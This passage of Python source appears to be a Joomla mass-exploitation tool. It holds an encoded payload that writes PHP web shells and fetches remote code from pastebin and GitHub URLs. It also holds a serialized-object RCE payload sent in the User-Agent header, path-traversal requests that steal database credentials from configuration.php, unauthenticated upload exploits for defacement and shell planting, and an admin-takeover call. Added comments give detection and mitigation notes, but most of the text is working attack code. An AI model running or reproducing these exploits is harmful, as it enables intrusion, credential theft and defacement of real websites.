2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc
2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=')")
  596. headers = {
  597. 'User-Agent': pl
  598. }
  599. try:
  600. cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
  601. except:
  602. pass
  603. try:
  604. rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
  605. if rr:
  606. requests.get('http://' + site + '/images/vuln2.php', timeout=5)
  607. requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
  608. ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  609. ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
  610. if 'Vuln!!' in ShellCheck.text:
  611. self.Print_vuln_Shell(site + '/images/vuln.php')
  612. with open('result/Shell_results.txt', 'a') as writer:
  613. writer.write('http://' + site + '/images/vuln.php' + '\n')
  614. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  615. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
  616. if 'Vuln!!' in IndexCheck.text:
  617. self.Print_Vuln_index(site + '/vuln.htm')
  618. with open('result/Index_results.txt', 'a') as writer:
  619. writer.write('http://' + site + '/vuln.htm' + '\n')
  620. elif 'Vuln!!' in IndexCheck2.text:
  621. self.Print_Vuln_index(site + '/images/vuln.htm')
  622. with open('result/Index_results.txt', 'a') as writer:
  623. writer.write('http://' + site + '/images/vuln.htm' + '\n')
  624. elif 'Vuln!!' in ShellCheck2.text:
  625. self.Print_vuln_Shell(site + '/tmp/vuln.php')
  626. with open('result/Shell_results.txt', 'a') as writer:
  627. writer.write('http://' + site + '/tmp/vuln.php' + '\n')
  628. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  629. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
  630. if 'Vuln!!' in IndexCheck.text:
  631. self.Print_Vuln_index(site + '/vuln.htm')
  632. with open('result/Index_results.txt', 'a') as writer:
  633. writer.write('http://' + site + '/vuln.htm' + '\n')
  634. elif 'Vuln!!' in IndexCheck2.text:
  635. self.Print_Vuln_index(site + '/images/vuln.htm')
  636. with open('result/Index_results.txt', 'a') as writer:
  637. writer.write('http://' + site + '/images/vuln.htm' + '\n')
  638. else:
  639. self.Print_NotVuln('RCE Joomla', site)
  640. else:
  641. self.Print_NotVuln('RCE Joomla', site)
  642. except:
  643. self.Print_NotVuln('RCE Joomla', site)
  644. except:
  645. self.Print_NotVuln('RCE Joomla', site)
  646.  
  def php_str_noquotes(self, data):
      """Return *data* as a dot-joined run of ``chr(N)`` terms, one per character.

      Any exception is swallowed, in which case the method returns None.
      """
      try:
          return ".".join("chr({0})".format(ord(symbol)) for symbol in data)
      except:
          pass
  655.  
  # Build the request-header value used by RCE_Joomla (which sends it as User-Agent).
  # php_payload is wrapped in eval(...) and embedded, with its length, as a string inside a
  # serialized PHP object graph naming JDatabaseDriverMysqli, JSimplepieFactory and SimplePie;
  # the four bytes in `terminate` are appended at the end. Returns the assembled string, or
  # None when any exception is swallowed by the bare except.
  # Defender notes: request headers containing "JDatabaseDriverMysqli", "JSimplepieFactory"
  # or "disconnectHandlers" are a strong indicator of this probe and are worth a log search
  # and a WAF rule. NOTE(review): this looks like the publicly documented Joomla session
  # object-injection technique; confirm the affected and fixed versions against the vendor
  # advisory before scoping exposure.
  656. def generate_payload(self, php_payload):
  657. try:
  658. php_payload = "eval({0})".format(php_payload)
  659. terminate = '\xf0\xfd\xfd\xfd';
  660. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  661. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
  662. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  663. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  664. return exploit_template
  665. except:
  666. pass
  667.  
  668.  
  # Fetch /language/en-GB/en-GB.xml from the site and, when the body contains 'version="3.',
  # run the external script files/adminTakeover.py with a fixed username and password
  # ("MArKAntoni") and the address in self.EMail. The script is not part of this listing;
  # presumably it registers an administrator with those values - confirm against the script.
  # Defender notes: a Joomla 3.x user named "MArKAntoni", or one registered with the e-mail
  # address hard-coded in __init__, is an indicator of compromise; /language/en-GB/en-GB.xml
  # discloses the installed version to anyone who requests it.
  # NOTE(review): `site` is concatenated unescaped into an os.system() command line, so
  # anyone analysing this tool should only run it in an isolated sandbox.
  669. def Joomla_TakeADmin(self, site):
  670. try:
  671. GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
  672. if 'version="3.' in GetVersion.text.encode('utf-8'):
  673. os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
  674. self.EMail + ' http://' + site)
  # Only an exception prints a result; a version mismatch is silent.
  675. except:
  676. self.Print_NotVuln('Maybe Add Admin 3.x', site)
  677.  
  # Request the s5_media_player helper script with a fileurl parameter that is base64 for
  # "../../../configuration.php". A response containing "JConfig" is treated as a successful
  # file read: the probe URL, then the host, user, password and db values matched in the
  # body, are appended to result/Config_results.txt.
  # Defender notes: search access logs for /plugins/content/s5_media_player/helper.php with a
  # fileurl parameter. If such a request was answered with the configuration file, treat the
  # database credentials and the other secrets stored in configuration.php as exposed, rotate
  # them, and remove or update the plugin.
  678. def Com_s5_media_player(self, site):
  679. try:
  680. Exp = 'http://' + site + \
  681. '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
  682. GetConfig = requests.get(Exp, timeout=5)
  683. if 'JConfig' in GetConfig.text.encode('utf-8'):
  684. self.Print_vuln_Config(site)
  685. with open('result/Config_results.txt', 'a') as ww:
  686. ww.write('Full Config Path : ' + Exp + '\n')
  # Field extraction is best effort: a missing match raises IndexError, which is swallowed.
  687. try:
  688. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  689. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  690. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  691. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  692. with open('result/Config_results.txt', 'a') as ww:
  693. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  694. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  695. 0] + '\n---------------------\n')
  696. except:
  697. pass
  698. else:
  699. self.Print_NotVuln('Com_s5_media_player', site)
  700. except:
  701. self.Print_NotVuln('Com_s5_media_player', site)
  702.  
  703. def Com_Hdflvplayer(self, site):
        # Requests com_hdflvplayer's download.php with f=../../../configuration.php
        # and treats a response containing 'JConfig' as a successful read of the
        # Joomla configuration file. On a hit it appends the request URL and the
        # regex-extracted host, user, password and db values to
        # result/Config_results.txt.
        # Detection note: download.php?f= with "../" sequences is the log signature.
        # Response: if a server answered with JConfig content, rotate the database
        # credentials and remove or update the component.
  704. try:
  705. Exp = 'http://' + site + \
  706. '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
  707. GetConfig = requests.get(Exp, timeout=5)
  708. if 'JConfig' in GetConfig.text.encode('utf-8'):
  709. self.Print_vuln_Config(site)
  710. with open('result/Config_results.txt', 'a') as ww:
  711. ww.write('Full Config Path : ' + Exp + '\n')
  712. try:
  713. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  714. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  715. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  716. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
        # [1] is the second regex match, [0] the first; an IndexError from a
        # shorter match list is silently discarded by the except below
  717. with open('result/Config_results.txt', 'a') as ww:
  718. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  719. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  720. 0] + '\n---------------------\n')
  721. except:
  722. pass
  723. else:
  724. self.Print_NotVuln('Com_Hdflvplayer', site)
  725. except:
  726. self.Print_NotVuln('Com_Hdflvplayer', site)
  727.  
  728. def Com_Joomanager(self, site):
        # Requests com_joomanager's download task with path=configuration.php and
        # treats a response containing 'JConfig' as a successful read of the Joomla
        # configuration file. On a hit it appends the request URL and the
        # regex-extracted host, user, password and db values to
        # result/Config_results.txt.
        # Detection note: option=com_joomanager with task=download and a path=
        # parameter naming configuration.php is the log signature.
        # Response: if a server answered with JConfig content, rotate the database
        # credentials and remove or update the component.
  729. try:
  730. Exp = 'http://' + site + \
  731. '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
  732. GetConfig = requests.get(Exp, timeout=5)
  733. if 'JConfig' in GetConfig.text.encode('utf-8'):
  734. self.Print_vuln_Config(site)
  735. with open('result/Config_results.txt', 'a') as ww:
  736. ww.write('Full Config Path : ' + Exp + '\n')
  737. try:
  738. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  739. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  740. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  741. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  742. with open('result/Config_results.txt', 'a') as ww:
  743. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  744. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  745. 0] + '\n---------------------\n')
        # reached when the field extraction above raises (e.g. IndexError); the
        # target has already been reported as a hit and the URL already written,
        # so the tool's own output is contradictory for such hosts
  746. except:
  747. self.Print_NotVuln('Com_Joomanager', site)
  748. else:
  749. self.Print_NotVuln('Com_Joomanager', site)
  750. except:
  751. self.Print_NotVuln('Com_Joomanager', site)
  752.  
  753.  
  754. def Com_Macgallery(self, site):
        # Requests com_macgallery's download view with albumid=../../configuration.php
        # and treats a response containing 'JConfig' as a successful read of the
        # Joomla configuration file. On a hit it appends the request URL and the
        # regex-extracted host, user, password and db values to
        # result/Config_results.txt.
        # Detection note: an albumid= value containing "../" is the log signature;
        # an album identifier should never contain path characters.
        # Response: if a server answered with JConfig content, rotate the database
        # credentials and remove or update the component.
  755. try:
  756. Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
  757. GetConfig = requests.get(Exp, timeout=5)
  758. if 'JConfig' in GetConfig.text.encode('utf-8'):
  759. self.Print_vuln_Config(site)
  760. with open('result/Config_results.txt', 'a') as ww:
  761. ww.write('Full Config Path : ' + Exp + '\n')
  762. try:
  763. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  764. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  765. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  766. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  767. with open('result/Config_results.txt', 'a') as ww:
  768. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  769. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  770. 0] + '\n---------------------\n')
        # reached when the field extraction above raises; the hit has already
        # been printed and the URL already written by this point
  771. except:
  772. self.Print_NotVuln('Com_Macgallery', site)
  773. else:
  774. self.Print_NotVuln('Com_Macgallery', site)
  775. except:
  776. self.Print_NotVuln('Com_Macgallery', site)
  777.  
  778. def Com_CCkJseblod(self, site):
        # Requests com_cckjseblod's download task with file=configuration.php and
        # treats a response containing 'JConfig' as a successful read of the Joomla
        # configuration file. On a hit it appends the request URL and the
        # regex-extracted host, user, password and db values to
        # result/Config_results.txt.
        # Detection note: option=com_cckjseblod with task=download and
        # file=configuration.php is the log signature.
        # Response: if a server answered with JConfig content, rotate the database
        # credentials and remove or update the component.
  779. try:
  780. Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
  781. GetConfig = requests.get(Exp, timeout=5)
  782. if 'JConfig' in GetConfig.text.encode('utf-8'):
  783. self.Print_vuln_Config(site)
  784. with open('result/Config_results.txt', 'a') as ww:
  785. ww.write('Full Config Path : ' + Exp + '\n')
  786. try:
  787. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  788. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  789. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  790. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  791. with open('result/Config_results.txt', 'a') as ww:
  792. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  793. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
        # reached when the field extraction above raises; the hit has already
        # been printed and the URL already written by this point
  794. except:
  795. self.Print_NotVuln('Com_CCkjseblod', site)
  796. else:
  797. self.Print_NotVuln('Com_CCkjseblod', site)
  798. except:
  799. self.Print_NotVuln('Com_CCkjseblod', site)
  800.  
  801. def Com_MyBlog(self, site):
        # POSTs the local image file as 'fileToUpload' to com_myblog's ajaxupload
        # task, then fetches the resulting image URL and records it in
        # result/Index_results.txt when the body starts like a GIF ('GIF89a').
        # Detection notes: an unauthenticated multipart POST to
        # option=com_myblog&task=ajaxupload followed by a GET for /images/pwn.gif
        # is the sequence to look for; an unexpected pwn.gif under /images/ is the
        # on-disk artefact.
        # Mitigation: remove or update the component and require authentication
        # for upload endpoints.
  802. try:
  803. fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
  804. Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
  805. GoT = requests.post(Exp, files=fileindex, timeout=5)
        # NOTE(review): `'success' or <expr>` is always truthy because 'success' is
        # a non-empty literal, so the follow-up GET below is issued for every
        # target that answers the POST and the matching else branch is unreachable
  806. if 'success' or 'File exists' in GoT.text.encode('utf-8'):
  807. if '/images/pwn' in GoT.text.encode('utf-8'):
  808. IndeXpath = 'http://' + site + '/images/pwn.gif'
  809. else:
  810. try:
  811. GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
  812. IndeXpath = GetPAth[0]
  813. except:
  814. IndeXpath = 'http://' + site + '/images/pwn.gif'
  815. CheckIndex = requests.get(IndeXpath, timeout=5)
  816. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  817. self.Print_Vuln_index(site + '/images/pwn.gif')
  818. with open('result/Index_results.txt', 'a') as writer:
  819. writer.write(IndeXpath + '\n')
  820. else:
  821. self.Print_NotVuln('Com_MyBlog', site)
  822. else:
  823. self.Print_NotVuln('Com_MyBlog', site)
  824. except:
  825. self.Print_NotVuln('Com_MyBlog', site)
  826.  
  827. def Com_Jdownloads_shell(self, site):
        # POSTs two local files ('file_upload' and 'pic_upload') plus fixed form
        # fields to com_jdownloads' upload view, then checks whether the picture
        # lands under /images/jdownloads/screenshots/ and whether /images/vuln.php
        # and /vuln.htm answer with the marker 'Vuln!!'. Hits are appended to
        # result/Shell_results.txt and result/Index_results.txt; every other
        # outcome falls through to self.Com_Jdownloads(site).
        # Detection notes: the hard-coded field name
        # '2d1a8f3bd0b5cf542e9312d74fc9766f' and the filetitle/description values
        # below are fixed strings and make a usable request signature; new files in
        # images/jdownloads/screenshots/, /images/vuln.php and /vuln.htm are the
        # on-disk artefacts.
        # Mitigation: update or remove the component, validate upload content
        # server-side, and disable script execution in upload directories.
        # NOTE(review): self.jdShell is not assigned in the portion of __init__
        # shown with this chunk; if it is undefined the AttributeError is caught
        # below and the method silently falls back to Com_Jdownloads — confirm.
  828. try:
  829. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
  830. 'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
        # 'description' appears twice in this literal; Python keeps the later value
  831. post_data = {
  832. 'name': 'ur name',
  833. 'mail': 'hacklinkhizmeti00@gmail',
  834. 'catlist': '1',
  835. 'filetitle': "lolz",
  836. 'description': "<p>zot</p>",
  837. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
  838. 'send': 1,
  839. 'senden': "Send file",
  840. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  841. 'option': "com_jdownloads",
  842. 'view': "upload"
  843. }
  844. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
  845. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  846. if '/upload_ok.png' in Got.text.encode('utf-8'):
  847. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
  848. Check = requests.get(checkUrl, timeout=5)
  849. if 'Vuln!!' in Check.text:
  850. ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  851. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  852. if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
  853. self.Print_vuln_Shell(site + '/images/vuln.php')
  854. with open('result/Shell_results.txt', 'a') as writer:
  855. writer.write(site + '/images/vuln.php' + '\n')
  856. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  857. self.Print_Vuln_index(site + '/vuln.htm')
  858. with open('result/Index_results.txt', 'a') as writer:
  859. writer.write(site + '/vuln.htm' + '\n')
  860. else:
  861. self.Com_Jdownloads(site)
  862. else:
  863. self.Com_Jdownloads(site)
  864. else:
  865. self.Com_Jdownloads(site)
  866. except:
  867. self.Com_Jdownloads(site)
  868.  
  869.  
  870. def Com_Jdownloads(self, site):
        # POSTs a local archive ('file_upload') and the local image ('pic_upload')
        # plus fixed form fields to com_jdownloads' upload view, then fetches the
        # image from /images/jdownloads/screenshots/ and records the URL in
        # result/Index_results.txt when the body contains 'GIF89a'.
        # Detection notes: the hard-coded field name
        # '2d1a8f3bd0b5cf542e9312d74fc9766f' and the fixed filetitle/description
        # values make a usable request signature; an unexpected image in
        # images/jdownloads/screenshots/ is the on-disk artefact.
        # Mitigation: update or remove the component and require authentication
        # and moderation for public uploads.
  871. try:
  872. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
  873. 'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
        # 'description' appears twice in this literal; Python keeps the later value
  874. post_data = {
  875. 'name': 'ur name',
  876. 'mail': 'hacklinkhizmeti00@gmail',
  877. 'catlist': '1',
  878. 'filetitle': "lolz",
  879. 'description': "<p>zot</p>",
  880. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
  881. 'send': 1,
  882. 'senden': "Send file",
  883. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  884. 'option': "com_jdownloads",
  885. 'view': "upload"
  886. }
  887. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
  888. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  889. if '/upload_ok.png' in Got.text.encode('utf-8'):
  890. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
  891. Check = requests.get(checkUrl, timeout=5)
  892. if 'GIF89a' in Check.text:
  893. self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
  894. self.Jce_Deface_image.split('/')[1])
  895. with open('result/Index_results.txt', 'a') as writer:
  896. writer.write(checkUrl + '\n')
  897. else:
  898. self.Print_NotVuln('Com_Jdownloads', site)
  899. else:
  900. self.Print_NotVuln('Com_Jdownloads', site)
  901. except:
  902. self.Print_NotVuln('Com_Jdownloads', site)
  903.  
  904.  
  905. def Com_Fabric(self, site):
        # POSTs a local text file as 'userfile' to com_fabrik's CSV import with fixed
        # form fields, then fetches the same file name from /media/ and records the
        # URL in result/Index_results.txt when the body contains 'Vuln!!'.
        # Detection notes: an unauthenticated POST to option=com_fabrik with
        # view=import&filetype=csv, followed by a GET for a new file under /media/,
        # is the sequence to look for.
        # Mitigation: update or remove the component and restrict the import
        # controller to authenticated administrators.
  906. try:
  907. fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
  908. post_data = {
  909. "name": "me.php",
  910. "drop_data": "1",
  911. "overwrite": "1",
  912. "field_delimiter": ",",
  913. "text_delimiter": "&quot;",
  914. "option": "com_fabrik",
  915. "controller": "import",
  916. "view": "import",
  917. "task": "doimport",
  918. "Itemid": "0",
  919. "tableid": "0"
  920. }
  921. Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
  922. requests.post(Exp, files=fileindex, data=post_data, timeout=5)
        # unlike the POST above, this GET passes no timeout
  923. Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
  924. if 'Vuln!!' in Check.text:
  925. self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
  926. with open('result/Index_results.txt', 'a') as writer:
  927. writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
  928. else:
  929. self.Print_NotVuln('Com_Fabric', site)
  930. except:
  931. self.Print_NotVuln('Com_Fabric', site)
  932.  
  933.  
  934. def Com_AdsManager(self, site):
        # POSTs the local image as 'file' to com_adsmanager's upload task, and when
        # the reply contains '"jsonrpc"' fetches the image from /tmp/plupload/ and
        # records the URL in result/Index_results.txt if the body contains 'GIF89a'.
        # When the reply lacks '"jsonrpc"' nothing is printed at all (the outer if
        # has no else).
        # Detection notes: an unauthenticated POST to
        # option=com_adsmanager&task=upload followed by a GET under /tmp/plupload/
        # is the sequence to look for; /tmp/plupload/ should not be web-readable.
        # Mitigation: update or remove the component and deny direct HTTP access
        # to Joomla's tmp directory.
  935. try:
  936. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
  937. post_data = {"name": self.Jce_Deface_image.split('/')[1]}
  938. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  939. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  940. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  941. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
  942. if 'GIF89a' in Check.text.encode('utf-8'):
  943. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
  944. with open('result/Index_results.txt', 'a') as writer:
  945. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
  946. else:
  947. self.Print_NotVuln('Com_AdsManager', site)
  948. except:
  949. self.Print_NotVuln('Com_AdsManager', site)
  950.  
  951. def Com_AdsManager_Shell(self, site):
        # POSTs a local file to com_adsmanager's upload task under three target
        # names (vuln.php, vuln.phP, vuln.phtml), requests each of them from
        # /tmp/plupload/, and then looks for the marker 'Vuln!!' at /images/vuln.php
        # and /vuln.htm. Hits go to result/Shell_results.txt and
        # result/Index_results.txt; every other outcome falls through to
        # self.Com_AdsManager(site).
        # Detection notes: the three file names under /tmp/plupload/, plus
        # /images/vuln.php and /vuln.htm, are the artefacts to search for on disk
        # and in access logs. The mixed-case and .phtml variants show why upload
        # filters must use an extension allowlist rather than a blocklist.
        # Mitigation: update or remove the component, deny HTTP access to tmp/, and
        # disable script execution in upload and image directories.
  952. try:
  953. fileindex = {'file': open(self.indeX, 'rb')}
  954. post_data = {"name": "vuln.php"}
  955. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  956. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
